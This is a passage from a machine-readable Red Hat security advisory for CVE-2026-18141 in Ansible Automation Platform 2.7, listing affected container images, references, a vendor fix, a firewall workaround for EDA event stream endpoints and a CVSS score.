"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-18141"
},
{
"category": "external",
"summary": "RHBZ#2508155",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2508155"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-18141",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-18141"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-18141",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-18141"
}
],
"release_date": "2026-07-31T15:28:47.213000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "workaround",
"details": "Restrict network access to the EDA event stream endpoints at the firewall or load balancer level. Ensure that only trusted sources are permitted to reach the event stream ports. Additionally, monitor EDA event logs for any unexpected events originating from unverified sources.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
